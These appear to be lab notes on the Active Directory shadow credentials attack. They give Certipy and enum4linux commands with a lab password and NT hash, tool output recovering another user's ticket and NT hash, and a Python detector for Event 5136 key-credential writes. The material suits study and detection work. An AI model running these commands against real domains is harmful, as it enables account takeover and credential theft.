Shadow Credentials

  • The shadow credentials attack consists of using the GenericAll or GenericWrite privilege on a user or computer object to write the attribute msDS-KeyCredentialLink (explanations here).

  • The DACL abuse section of The Hacker Recipes, by Shutdown (@_nwodtuhs), covers this: https://www.thehacker.recipes/ad/movement/dacl

  • This attack is very useful when you have write access on another user.

  • With GenericWrite you can only do:

    • Targeted Kerberoasting: add an SPN to the user, Kerberoast it, then remove the SPN. But the user's password must be weak for the Kerberoasting attack to work.

    • Set up a logon script: change the LDAP attributes to set a logon script. But this implies that the user logs on to their computer, that an SMB server or share serves the script, and that the script bypasses the security solutions in place.

    • Shadow credentials: the attack we want to do; it requires a certificate service (AD CS) on the domain.

  • With GenericAll you can:

    • ForceChangePassword: but on a real pentest you don't want to lock a user out by changing their password, and it is not very stealthy either. So if you can do it another way, that is better :)

    • All the attacks available in the GenericWrite part.

So if AD CS is enabled on the domain and we have write privilege on msDS-KeyCredentialLink, we can do the shadow credentials attack to get direct access to the user account. This seems to be the best option in this case on a real pentest.

  • Shadow credentials is now included in Certipy (this attack can also be done with pyWhisker).

joaquin.Pereida@maryland.local > Marisol.Pedrosa > Teresa.Perez
enum4linux -u joaquin.Pereida@maryland.local -p horse -G 192.168.56.12

Start BloodHound and Neo4j

sudo /usr/bin/./neo4j console
sudo /opt/tools/BloodHound4.2-ly4k/BloodHound-linux-x64/BloodHound  --no-sandbox --disable-dev-shm-usage
certipy shadow auto -u joaquin.Pereida@maryland.local -p 'horse' -account 'marisol.Pedrosa'

  • And we can do the same from Marisol.Pedrosa to teresa.Perez

certipy shadow auto -u marisol.Pedrosa@maryland.local -hashes 'fd208d19680104ddb8e3d90962c0334e' -account 'teresa.Perez'
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Targeting user 'teresa.Perez'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '4d026165-030a-b52a-4ae9-9c0c28eb1fe9'
[*] Adding Key Credential with device ID '4d026165-030a-b52a-4ae9-9c0c28eb1fe9' to the Key Credentials for 'teresa.Perez'
[*] Successfully added Key Credential with device ID '4d026165-030a-b52a-4ae9-9c0c28eb1fe9' to the Key Credentials for 'teresa.Perez'
[*] Authenticating as 'teresa.Perez' with the certificate
[*] Using principal: teresa.perez@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'teresa.perez.ccache'
[*] Trying to retrieve NT hash for 'teresa.perez'
[*] Restoring the old Key Credentials for 'teresa.Perez'
[*] Successfully restored the old Key Credentials for 'teresa.Perez'
[*] NT hash for 'teresa.Perez': 4d737ec9ecf0b9955a161773cfed9611
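The transcript above shows the tool adding a key credential and then restoring the old value a few seconds later. On the defensive side, both writes surface as Security Event ID 5136 when "Audit Directory Service Changes" is enabled with an auditing entry on the objects. As an added example (not part of the original notes or of Certipy), the Python below scans constructed 5136 records for msDS-KeyCredentialLink writes made by a principal other than the account itself and for the add-then-restore pattern; the field names and sample values are assumptions made for the demonstration.

```python
# Detection for msDS-KeyCredentialLink writes in Security Event ID 5136
# (needs 'Audit Directory Service Changes' and an auditing entry on the objects).
from datetime import datetime

ATTRIBUTE = "msDS-KeyCredentialLink"
VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"  # 5136 OperationType codes

# Constructed sample events, reduced to the 5136 fields the check uses.
SAMPLE_EVENTS = [
    {"time": "2023-06-01T10:00:00", "id": 5136, "subject": "MARYLAND\\marisol.pedrosa",
     "object": "CN=teresa.Perez,CN=Users,DC=maryland,DC=local", "attr": ATTRIBUTE, "op": VALUE_ADDED},
    {"time": "2023-06-01T10:00:05", "id": 5136, "subject": "MARYLAND\\marisol.pedrosa",
     "object": "CN=teresa.Perez,CN=Users,DC=maryland,DC=local", "attr": ATTRIBUTE, "op": VALUE_DELETED},
    # Self-registration (an account writing its own key) is expected and skipped.
    {"time": "2023-06-01T11:00:00", "id": 5136, "subject": "MARYLAND\\bob.smith",
     "object": "CN=bob.smith,CN=Users,DC=maryland,DC=local", "attr": ATTRIBUTE, "op": VALUE_ADDED},
    # Write to another attribute on the same target: not in scope.
    {"time": "2023-06-01T11:05:00", "id": 5136, "subject": "MARYLAND\\marisol.pedrosa",
     "object": "CN=teresa.Perez,CN=Users,DC=maryland,DC=local", "attr": "description", "op": VALUE_ADDED},
]

def target_sam(object_dn):
    """Lower-cased CN of the first RDN, used here as a stand-in for sAMAccountName."""
    return object_dn.split(",", 1)[0].split("=", 1)[1].lower()

def find_shadow_credential_writes(events, window_seconds=600):
    """Return (subject, target, reason) alerts for key-credential writes made by a
    principal other than the account itself; an add followed by a delete from the
    same subject within window_seconds (the add-then-restore pattern) is also flagged."""
    alerts, last_add = [], {}
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] != 5136 or ev["attr"] != ATTRIBUTE:
            continue
        target = target_sam(ev["object"])
        subject = ev["subject"].split("\\")[-1].lower()
        if subject == target:
            continue  # self-service key registration is expected
        ts = datetime.fromisoformat(ev["time"])
        if ev["op"] == VALUE_ADDED:
            last_add[(subject, target)] = ts
            alerts.append((subject, target, "key credential added by another principal"))
        elif ev["op"] == VALUE_DELETED:
            added = last_add.get((subject, target))
            if added is not None and (ts - added).total_seconds() <= window_seconds:
                alerts.append((subject, target, "add-then-restore within window"))
    return alerts
```

In a real deployment the subject check would also allowlist the service accounts that legitimately register keys (device registration, directory sync), since those write the attribute for other principals.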
